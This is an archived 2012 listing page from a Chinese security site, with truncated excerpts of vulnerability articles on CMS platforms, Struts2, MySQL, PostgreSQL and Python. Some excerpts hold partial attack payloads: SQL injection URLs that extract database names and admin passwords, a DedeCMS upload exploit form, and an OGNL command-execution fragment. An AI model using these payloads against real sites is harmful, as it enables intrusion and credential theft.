首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>漏洞资料>列表
SAE云服务安全沙箱绕过2(利用crackClassLoader)
  日期:2012-07-24 15:31:05 点击:111 评论:0
摘要 绕过安全沙盒技术,并非只有使用java漏洞才能做。在作者的文章 《SAE云服务安全沙箱绕过》(http://www.inbreak.net/archives/389) 中提到了一种使用java沙盒漏洞,绕过沙盒的例子。事实上,bypass了SAE沙盒后,作者把目标已经换成了GAE,但是这是很郁闷的,google
最新python提权:python-wrapper及python 不可信的搜索路径/代码执行漏洞
  日期:2012-07-20 15:00:26 点击:113 评论:0
exploit-db.com近日爆了一个奇特的漏洞 。只要诱使root在当前目录,通过python或者python-wrapper执行一下help(modules)命令,后台就以root权限执行该目录下test.py脚本。 ///adalia是普通用户,以下显示test.py的权限和脚本内容。脚本内容其中一项是chmod 4755 /usr/b
SAE云服务安全沙箱绕过
  日期:2012-07-19 14:30:05 点击:100 评论:0
By kxlzx http://www.inbreak.net 微博:http://t.qq.com/javasecurity ps:此漏洞,新浪已修复。 摘要 新浪有云服务(SAE),提供PHP、JAVA等环境,供用户搭建网站,用户都在同一个云上,为了防止恶意用户在云上面DDOS,旁注黑掉其他云用户什么的,所以必须做安全限制,
phpcms 2008多个漏洞 (可getshell)
  日期:2012-07-18 11:01:13 点击:103 评论:0
简要描述: 一个漏洞不可怕,可怕的是一连串的漏洞,拼接起来就可以getshell了。 详细说明: ###文件包含?phpdefine('IN_YP', TRUE);define('ADMIN_ROOT', str_replace(\, '/',dirname(__FILE__)).'/');require '../include/common.inc.php';## 要登陆if(!
Discuz7.X通杀0day(UCenter Home-2.0)
  日期:2012-07-18 11:00:04 点击:198 评论:0
http://www.xxx.com/shop.php?ac=viewshopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,027,unhex(hex(database())),027,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group
phpcms v9注入漏洞
  日期:2012-07-18 10:59:45 点击:244 评论:0
http://localhost/phpcms/index.php?a=list_typec=indexm=linksiteid=+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,027,unhex(Hex(cast(v9_admin.password+as+char))),027,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0
Velocity Parse()函数引发的本地包含漏洞及利用方法
  日期:2012-07-11 11:09:52 点击:90 评论:0
一 背景及描述 Velocity是一个基于java的模板引擎(template engine),它允许任何人仅仅简单的使用模板语言(template language)来引用由java代码定义的对象。我们知道, 越是功能强大、函数丰富的渲染层语言 (从某种意义上来说,PHP也可归类为渲染层语言)越会带来
织梦cms v6.7最新上传漏洞
  日期:2012-07-10 11:23:27 点击:114 评论:0
form action=http://127.0.0.1/plus/carbuyaction.php?dopost=memclickoutoid=S-P0RN8888rs[code]=../dialog/select_soft_post method=post enctype=multipart/form-data name=form1 file:input name=uploadfile type=file /br newname:input name=newname type=text v
SHOPEX 4.8.5 注入漏洞以及后台拿SHELL
  日期:2012-07-10 11:07:09 点击:477 评论:0
SHOPEX 4.8.5 注入漏洞以及后台拿SHELL 有人贴出来一个,我就转出来下吧,给大家看看。 漏洞文件: 漏洞核心函数 coremodel_v5tradingmdl.goods.php 漏洞代码: public function getProducts( $gid, $pid = 0 ){$sqlWhere = ;if ( 0 $pid ){$sqlWhere = AND A.prod
structs2 远程命令执行漏洞分析
  日期:2012-07-02 11:24:17 点击:1192 评论:0
简要描述: 很惊异 老漏洞一下子爆发了这么多 是工具刷rank ? 能否分析下原理。 详细说明: 大牛们不要见笑。 新的exp 构造的很精巧 以POST的方式提交绕过对输入参数的部分过滤。 ('43_memberAccess.allowStaticMethodAccess')(a)=true(b)(('43context['xwork.Meth
Dedecms 注射漏洞获得管理员密码
  日期:2012-06-18 11:22:30 点击:162 评论:0
简要描述: Dedecms 某文件没过滤直接带入sql查询,攻击者在magic_quotes_gpc=off时,可以注射SQL代码,绕过sqlids检测,执行sql语句. 详细说明: 要求会员中心,注册用户登录,magic_quotes_gpc=off,以及php版本要求,其实也没有什么危害. 漏洞代码如下: root@bt:/var/www/de
Thinkphp框架动态执行漏洞
  日期:2012-06-13 13:15:52 点击:196 评论:0
ThinkPHP是一个开源的PHP框架, 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循 Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的
Mysql身份认证漏洞及利用(CVE-2012-2122)
  日期:2012-06-12 10:37:21 点击:138 评论:0
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。 按照公告说法大约 256次 就能够蒙对一次。而且漏
PostgreSQL基于错误XML外部实体攻击
  日期:2012-06-12 10:37:21 点击:83 评论:0
最近国外安全人员发现了一个PostgreSQL(所有版本)基于错误XML外部实体执行的高危漏洞。 经测试,该漏洞可以从数据库服务器请求到内网 (SSRF-服务器端请求伪造) ,并可以利用xml实体注入读取任意本地文件。 实例: DoS: select xmlparse ( document '?xml version=1
DeDeCMS v5.7最新ajax_membergroup.php注入漏洞分析
  日期:2012-05-04 11:30:12 点击:720 评论:0
http://www.yunsec.net/member/ajax_membergroup.php 页面的membergroup变量没有过滤导致数字型注入,关键代码如下: elseif($action == 'post') { if(empty($membergroup)){ echo 您还没有设置分组!; exit; } $sql = UPDATE ` SET `groupid`='{$membergroup}' WHE
HDWiki 5.1 任意用户密码修改漏洞
  日期:2012-04-20 09:39:09 点击:233 评论:0
简要描述: HDWiki重置密码存在一处逻辑漏洞,导致攻击者可以修改任意用户密码。 详细说明: control/user.phpfunction dogetpass(){ ......}elseif(isset($this-post['verifystring'])){$uid=$this-post['uid'];$encryptstring=$this-post['verifystring'];$idstring=
最土团购程序最新sql注入漏洞利用及修复
  日期:2012-04-09 15:46:25 点击:127 评论:0
近期最土团购程序爆出一个高危漏洞,通过该漏洞利用方法,入侵者可以在10秒内获取最土团购网站的大量用户信息和订单信息等。 因为最土是团购类程序,数据库中保存有用户的邮箱和电话,甚至有用户的住址等,对网站用户来说,这些隐私信息一旦被别人获取,会带来很多的麻
ThinkPHP framework 任意代码执行漏洞预警
  日期:2012-04-09 15:45:47 点击:164 评论:0
ThinkPHP是一个国内使用很广泛的老牌PHP MVC框架。貌似国内有不少创业公司或者项目都用了这个框架。 最近官方发布了一个 安全补丁 ,官方表述是: 该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。 可是貌似大多数开发者和使用者并没有注意到此漏洞的危害性,
Spring framework(cve-2010-1622)漏洞利用指南
  日期:2012-04-05 10:13:28 点击:791 评论:0
By 空虚浪子心 http://www.inbreak.net/ @javasecurity http://t.qq.com/javasecurity 摘要 这个漏洞在2010年出的,当时由于环境问题,并没有找到稳定利用的EXP。作者对spring mvc框架不熟悉,很多地方不了解,结果研究了一半,证明了漏洞的部分严重性就放下了,没有弄
struts2框架XSLTResult本地文件代码执行漏洞
  日期:2012-03-26 14:18:23 点击:121 评论:0
这是个没有人公布过的漏洞,偶尔看代码发现的。事实上,这段代码用的人不多,需要同时满足两个情况,才可以搞。我猜测,发出struts2远程代码执行的那个大牛,不可能没发现这么弱智的漏洞。所以,要么是有原因不能公布,要么就是卖了,那就好,这次我首发,哈哈哈! 先讲
共37页/730条记录 首页 上一页 [1] [2] 3 [4] [5] [6] [7] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  入侵实例
  Exploits
  系统安全
  网络安全
  网络基础
  病毒分析
漏洞资料
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved